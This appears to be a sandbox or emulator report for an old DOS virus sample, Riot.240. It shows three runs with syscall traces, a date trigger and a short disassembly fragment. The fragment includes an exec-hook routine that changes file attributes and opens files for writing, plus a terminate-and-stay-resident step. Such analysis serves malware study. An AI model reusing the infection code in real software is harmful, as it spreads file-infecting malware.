Sample viewer

vx.netlux.org/Virus.DOS.Riot.240

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:00:28.894764401Z 42 PC: 12a44 | Get date 0x12a44: cmp dl, 0x15
0x12a47: je 0x12a53
0x12a49: mov ah, 9
0x12a4b: mov dx, 0x1b8
0x12a4e: int 0x21
0x12a50: jmp 0x12a5d
0x12a52: nop
0x12a53: mov cx, 0x3e8
0x12a56: mov ax, 0xe07
0x12a59: int 0x10
0x12a5b: loop 0x12a59
0x12a5d: jmp 0x12b12
0x12a60: pushf
0x12a61: cmp ah, 0x4b
0x12a64: je 0x12a68
0x12a66: jmp 0x12aa1
0x12a68: mov ax, 0x4301
0x12a6b: and cl, 0xfe
0x12a6e: int 0x21
0x12a70: mov ax, 0x3d02
2018-12-17T23:00:28.897325263Z 9 PC: 12a50 | Display string (String= 'Bad command or filename ')
2018-12-17T23:00:28.902452067Z 53 PC: 12b17 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T23:00:28.906087609Z 37 PC: 12b29 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T23:00:28.908681213Z 49 PC: 12b30 | Terminate and stay resident (Return code = '0' | Memory size = '31')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13555,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:38:23.578736005Z 42 PC: 12a44 | Get date 0x12a44: cmp dl, 0x15
0x12a47: je 0x12a53
0x12a49: mov ah, 9
0x12a4b: mov dx, 0x1b8
0x12a4e: int 0x21
0x12a50: jmp 0x12a5d
0x12a52: nop
0x12a53: mov cx, 0x3e8
0x12a56: mov ax, 0xe07
0x12a59: int 0x10
0x12a5b: loop 0x12a59
0x12a5d: jmp 0x12b12
0x12a60: pushf
0x12a61: cmp ah, 0x4b
0x12a64: je 0x12a68
0x12a66: jmp 0x12aa1
0x12a68: mov ax, 0x4301
0x12a6b: and cl, 0xfe
0x12a6e: int 0x21
0x12a70: mov ax, 0x3d02
2018-12-25T12:38:23.584125049Z 9 PC: 12a50 | Display string (String= 'Bad command or filename ')
2018-12-25T12:38:23.592838836Z 53 PC: 12b17 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:38:23.594221774Z 37 PC: 12b29 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:38:23.59558532Z 49 PC: 12b30 | Terminate and stay resident (Return code = '0' | Memory size = '31')

{"DateBased":true,"Day":21,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13555,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:38:27.214213241Z 42 PC: 12a44 | Get date 0x12a44: cmp dl, 0x15
0x12a47: je 0x12a53
0x12a49: mov ah, 9
0x12a4b: mov dx, 0x1b8
0x12a4e: int 0x21
0x12a50: jmp 0x12a5d
0x12a52: nop
0x12a53: mov cx, 0x3e8
0x12a56: mov ax, 0xe07
0x12a59: int 0x10
0x12a5b: loop 0x12a59
0x12a5d: jmp 0x12b12
0x12a60: pushf
0x12a61: cmp ah, 0x4b
0x12a64: je 0x12a68
0x12a66: jmp 0x12aa1
0x12a68: mov ax, 0x4301
0x12a6b: and cl, 0xfe
0x12a6e: int 0x21
0x12a70: mov ax, 0x3d02
2018-12-25T12:38:27.220885471Z 53 PC: 12b17 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:38:27.222103217Z 37 PC: 12b29 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:38:27.223274079Z 49 PC: 12b30 | Terminate and stay resident (Return code = '0' | Memory size = '31')